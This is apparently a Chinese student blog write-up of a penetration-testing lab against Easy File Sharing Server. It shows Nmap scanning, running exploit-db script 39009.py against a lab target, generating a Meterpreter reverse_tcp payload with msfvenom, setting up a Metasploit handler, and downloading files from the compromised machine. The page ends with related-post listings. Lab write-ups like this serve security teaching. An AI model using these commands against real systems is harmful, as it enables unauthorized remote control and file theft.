网络渗透测试复现任务easy file sharing server

已于 2024-01-04 21:38:18 修改
阅读量429 收藏 10
点赞数 9
文章标签: 网络
于 2024-01-02 22:54:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74897691/article/details/135316377
版权
本文介绍了如何通过easyfilesharingserver漏洞进行靶机渗透,涉及Nmap扫描、Metasploit工具链及Meterpreter利用过程。
摘要由CSDN通过智能技术生成

一、漏洞渗透测试

(一)靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。

1.在Win2003中安装easy file sharing server(efssetup_2018.zip)

2.将efssetup_2018.zip直接拖进Win2003解压并安装,一直next即可,安装路径可以自己选择,安装成功后直接Try it!由于80端口被占用,所以这里将端口改为8000

(二)利用Nmap发现靶(Windows)运行了该服务

1.kali和Windows均设为桥接模式并连接手机热点

2.kali在root模式下对整个子网进行扫描

3.找到Windows靶机存活且ip为192.168.154.209

4.使用nmap -sV 192.168.154.209扫描靶机端口开放情况,发现靶机开放了easy file sharing server服务

5.使用命令searchsploit easy file sharing检测easy file sharing server存在的漏洞

6.对于39009.py程序,使用命令searchsploit -m 39009查询地址

7.执行python2 /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.154.209 8000命令,Windows靶机即会弹出计算器,easy file sharing server被终止

二、Metasploit应用

1.在kali用ifconfig命令得到kali的ip

kali:192.168.154.135

2.使用命令msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.154.135 lport=5000 -f exe -o /root/payload.exe在桌面生成一个payload.exe文件

3.使用命令msfconsole打开Metasploit

4.在Metasploit中依次使用指令

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.154.135

set lport 5000

exploit

5使用命令chmod 777 /root打开root文件的查看权限,将payload.exe文件移至Windows靶机中并双击运行,并在kali中查看变化,出现以下的提示则证明已经获得了对靶机的操控权限

6.使用ls命令查看文件

7.使用命令download 文件名下载所需要的文件即可

⌓‿⌓——•᷄ࡇ•᷅
关注
Easy File Sharing Web Server 7.2
01-15
Easy File Sharing Web Server 是一种允许访客容易地经由浏览器上传/下载文件的文件分享系统.
【漏洞复现Easy File Sharing Web Server 漏洞的简单利用
qq_44655084的博客
12-20 1256
EFS Web Server 7.2版本中存在基于栈的缓冲区溢出漏洞。远程攻击者可通过向forum.ghp文件发送恶意的登录请求利用该漏洞执行任意代码。
Kali Linux 基于Easy File Sharing Web Server 6.9 编写漏洞渗透模块 (上)
xujing19920814的博客
10-05 1397
可以实现对简单文件共享Web服务器的登录测试简单文件共享Web服务器是否存在溢出漏洞。方法很简单,向目标程序发送一个足够长的用户名,查看目标程序的反应即可。我们需要使用pattern_create.rb来产生10000个字符,命令如下可以确定SEH的偏移量为4059这个命令执行的结果是生成,C:\Program Files\ImmunityInc\Immunity Debugger\rop.txt文件。只有其中不受SafeSEH机制保护的才可以使用,也就是表中SafeSEH列值为False的。
easy file sharing web server 复现 + msf被控端与主控端使用
WRplayeR的博客
12-20 536
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。选择使用 exploit/windows/http/easyfilesharing_seh 这个攻击模块。使用命令msfvenom -p windows/meterpreter/reverse_tcp。退出命令行后使用download下载efssetup_20181文件,成功。3、利用该漏洞,使得靶机运行计算器。2、利用Nmap扫描发现靶机(Windows)运行了该服务。
Easy File Sharing Web Server漏洞复现
m0_73952621的博客
01-03 420
4、在kali中执行python2 /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.228.57 8080。1、在靶机(Win2003)中安装easy file sharing server,端口改为8080,URL为靶机ip。1、利用Nmap扫描发现靶机(Windows)运行了该服务。2、在kali中用nmap -sV扫描靶机IP。2、利用该漏洞,使得靶机运行计算器。打开靶机即可看到计算器被调用了。1、win2003靶机。
网络渗透测试复现任务(1).pdf
11-07
网络渗透测试复现任务(1).pdf
使用numpy复现贝叶斯网络
10-16
贝叶斯网络的主要任务包括学习CPT、推理和预测。 在使用NumPy实现贝叶斯网络时,首先我们需要创建节点类,每个节点类应包含其可能的状态、父节点信息以及条件概率表。例如,可以定义一个Node类,包含以下属性: 1....
基于Matlab复现深度网络(源码+数据).rar
05-08
1、资源内容:基于Matlab复现深度网络(源码+数据).rar 2、适用人群:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业或毕业设计,作为“参考资料”使用。 3、更多仿真源码和数据集下载列表(自行...
keras复现场景文本检测网络CPTN项目源码
10-13
keras复现场景文本检测网络CPTN项目源码 效果: ​ 使用ICDAR2015的1000张图像训练在500张测试集上结果为:Recall: 37.07 % Precision: 42.94 % Hmean: 39.79 %; 原文中的F值为61%;使用了额外的3000张图像训练。 ...
复现easy file sharing server漏洞渗透测试及Metasploit应用
m0_75239462的博客
01-03 521
(二)打开easy file sharing server,在kali终端输入nmap -sV 192.168.5.30命令进行扫描,发现靶机上的8080端口运行着“easy file sharing server”软件,版本为6.9。-o:存放payload.exe的路径,我选择的是把payload.exe下载在root文件夹里,即/root/payload.exe,也可以直接存放在桌面。(四)靶机上运行payload.exe程序 ,返回kali发现在Metasploit中打开了一个session。
【漏洞复现Easy File Sharing Web Server 6.9漏洞复现
2201_75406260的博客
12-25 646
首先在win2003靶机安装easy file sharing server,可以查看到端口和该靶机的IP地址,原来的端口是80的,但后面我扫描的时候发现80端口被占用了,只能改成8080端口了。但当我们输入一长串用户名,也就是不规则长度用户名时,网站自动断网,然后win2003靶机里面打开的Easy File Sharing Web Server 6.9也自动闪退了。1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。
Easy File Sharing Web Server 缓冲区溢出漏洞
young的博客
10-22 1022
Easy File Sharing Web Server 缓冲区溢出漏洞 一、首先我们需要打开虚拟机,并再windows系统上运行Easy File Sharing Web Server 二、将Easy File Sharing Web Server的端口改为8080,然后按下Restart 三、使用Nmap对目标进行扫描,确定目标主机上运行着这个软件 1.查找目标主机的ip IP查找过程: 2.在Kali Linux 2 中打开一个终端,在其中执行“nmap”命令 输入:nmap -sV 10.
easy file sharing server-漏洞的简单利用
weixin_44912169的博客
04-08 2282
easy file sharing server-漏洞的简单利用 1.win7靶机安装easy file sharing server 将efssetup_2018.zip解压安装到win7虚拟机中,然后将port改为8000然后点击restart即可,如下图 2.使用nmap扫描主机 nmap -sV -A -o easy-file.txt 192.168.126.132 -sV 服务版本...
漏洞渗透测试(efssetup_2018.zip)
qq_53639387的博客
11-15 2409
1.我们尽量在vm中安装一个win系统的虚拟机,因为这个测试安装在我们的物理机上有一定的风险。在虚拟机win7上安装好vmware tool,那样我们就可以直接拖文件进虚拟机里面了 在win7中安装easy file sharing server(efssetup_2018.zip)一直下一步就好,不用购买,点try it 2.用ipconfig命令得靶机的IP 3.打开kali终端 nmap 目标靶机ip地址/24,发现了80端口开放着http服务 4.然后用nmap -...
嵌入式学习-网络高级-Day01
Xiaomo1536的博客
11-06 1155
对于读数据以及写单个来说,在主机询问报文里面报文头中字节长度固定,都是0x0006,(1个字节的单元标识符,1个字节功能码,2个字节的地址,2个字节的数据)输入寄存器,这个和保持寄存器类似,但是也是只支持读而不能写。报文头------功能码-------起始地址-------数量--------字节计数--------数据。报文头(字节长度可能发生变化)------功能码------字节计数-------数据。报文头------功能码-------地址-------数据/断通标志(2个字节)
字节序(Byte Order)
最新发布
weixin_50993868的博客
11-11 163
字节序与平台字节序转换字节序(Byte Order)是指数据在内存中存储时字节的排列顺序。由于不同的计算机体系结构可能采用不同的字节序,因此理解字节序非常重要,特别是在处理多平台数据传输或存储时。
网络安全 | 漏洞挖掘】隐藏的 DOS 技术
等风来
11-11 105
我调查了这些参数的用途,发现它们被传递给了第三方服务,且该服务的文档说明这些参数是安全的。你可以试试这样做:前往https://ash-speed.hetzner.com/并找到一个测试文件(大小大约1到10 GB),如果服务器等待URL请求完成,你可以通过大量此类请求来淹没服务器,从而导致它最终崩溃。于是我发送了一个包含1000个UUID的列表,结果网站在60秒后超时,并出现了显著的延迟。在我的案例中,这导致了客户网站的DOS攻击,问题被发现并快速修复,甚至在我报告漏洞之前。
Linux:网络协议socket
Au_ust的博客
11-05 1208
我们之前学的通信是本地进程间通信,如果我们想在网络间通信的话,就需要用到二者的ip地址,分别被称为源IP地址和目的IP地址,被存入ip数据包中,其次我们还需要遵循一些通信协议。TCP协议:传输层协议,有连接,可靠传输,面向字节流(无明确边界的字节序列),难UDP协议:传输层协议,无连接,不可靠传输,面向数据流(以数据包为单位),简单网络通信的本质也是进程间通信,你怎么知道你要和哪个进程通信?
渗透测试利器BypassAV-GUI:实战拟态与漏洞复现
标签中提及的“网络安全”、“渗透测试”、“红蓝对抗”、“信息技术”和“实战”是当前网络安全领域内非常重要的几个关键词。网络安全是保护计算机网络和数据免受未授权访问或损害的实践和研究。渗透测试是一种安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值